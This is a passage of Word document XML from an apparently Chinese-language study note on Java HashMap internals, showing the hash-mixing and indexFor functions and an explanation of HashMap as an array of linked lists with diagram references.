          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> h) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00527B1F" w:rsidRPr="00F41A4C" w:rsidRDefault="00527B1F" w:rsidP="00527B1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008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>// This function ensures that hashCodes that differ only by</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00527B1F" w:rsidRPr="00F41A4C" w:rsidRDefault="00527B1F" w:rsidP="00527B1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008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">        // constant multiples at each bit position have a bounded</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00527B1F" w:rsidRPr="00F41A4C" w:rsidRDefault="00527B1F" w:rsidP="00527B1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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">        // number of collisions (approximately 8 at default load factor).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00527B1F" w:rsidRPr="00F41A4C" w:rsidRDefault="00527B1F" w:rsidP="00527B1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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">        h ^= (h &gt;&gt;&gt; 20) ^ (h &gt;&gt;&gt; 12);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00527B1F" w:rsidRPr="00F41A4C" w:rsidRDefault="00527B1F" w:rsidP="00527B1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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> h ^ (h &gt;&gt;&gt; 7) ^ (h &gt;&gt;&gt; 4);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00527B1F" w:rsidRPr="00F41A4C" w:rsidRDefault="00527B1F" w:rsidP="00527B1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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00527B1F" w:rsidRPr="00F41A4C" w:rsidRDefault="00527B1F" w:rsidP="00527B1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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00527B1F" w:rsidRPr="00F41A4C" w:rsidRDefault="00527B1F" w:rsidP="00527B1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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> indexFor(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> h, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> length) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00527B1F" w:rsidRPr="00F41A4C" w:rsidRDefault="00527B1F" w:rsidP="00527B1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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> h &amp; (length-1);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00527B1F" w:rsidRPr="00F41A4C" w:rsidRDefault="00527B1F" w:rsidP="00527B1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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00527B1F" w:rsidRPr="00F41A4C" w:rsidRDefault="00527B1F" w:rsidP="00527B1F">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="9CBA39"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="190500" cy="190500"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="34" name="图片 5" descr="复制代码">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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复制代码">
                      <a:hlinkClick r:id="rId10" tooltip="&quot;复制代码&quot;"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="190500" cy="190500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B161D8" w:rsidRPr="00F41A4C" w:rsidRDefault="00B161D8" w:rsidP="00DE5C45">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007A7BF7" w:rsidRPr="00F41A4C" w:rsidRDefault="007A7BF7" w:rsidP="00FF3D5F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F93415" w:rsidRPr="00F41A4C" w:rsidRDefault="004D17F7" w:rsidP="004D17F7">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.3</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00F93415" w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  HashMap</w:t>
      </w:r>
      <w:r w:rsidR="00F93415" w:rsidRPr="00F41A4C">
        <w:t>源码</w:t>
      </w:r>
      <w:r w:rsidR="00EC727E" w:rsidRPr="00F41A4C">
        <w:t>分析</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F93415" w:rsidRPr="00F41A4C" w:rsidRDefault="00832206" w:rsidP="00F93415">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Hashmap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>实际上是一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>数组和链表的结合体</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>（在数据结构中，一般称之为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>链表散列</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>），请看下图（横排表示数组，纵排表示数组元素【实际上是一个链表】）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00371D78" w:rsidRPr="00F41A4C" w:rsidRDefault="00371D78" w:rsidP="00DF76B3">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="3406325"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="11" name="图片 1" descr="http://hi.csdn.net/attachment/201102/24/0_1298551673zkZg.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hi.csdn.net/attachment/201102/24/0_1298551673zkZg.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="3406325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00371D78" w:rsidRPr="00F41A4C" w:rsidRDefault="00371D78" w:rsidP="00F93415">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00371D78" w:rsidRPr="00F41A4C" w:rsidRDefault="00371D78" w:rsidP="00371D78">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4548961" cy="3019425"/>
            <wp:effectExtent l="19050" t="0" r="3989" b="0"/>
            <wp:docPr id="12" name="图片 4" descr="http://hi.csdn.net/attachment/201102/24/0_1298551680JS8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hi.csdn.net/attachment/201102/24/0_1298551680JS8E.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4550211" cy="3020255"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF76B3" w:rsidRPr="00F41A4C" w:rsidRDefault="00DF76B3" w:rsidP="00DF76B3">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>上图中，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>X</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>轴方向为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的数组容器，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Y</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>轴方向，为每个相应位置的单向链表。每一个元素都是一个包含如图所示四个属性，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>key,value,hash,next</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的一种数据结构，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF76B3" w:rsidRPr="00F41A4C" w:rsidRDefault="00DF76B3" w:rsidP="00371D78">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>即</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>EntrySet,</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>其中的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>next</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
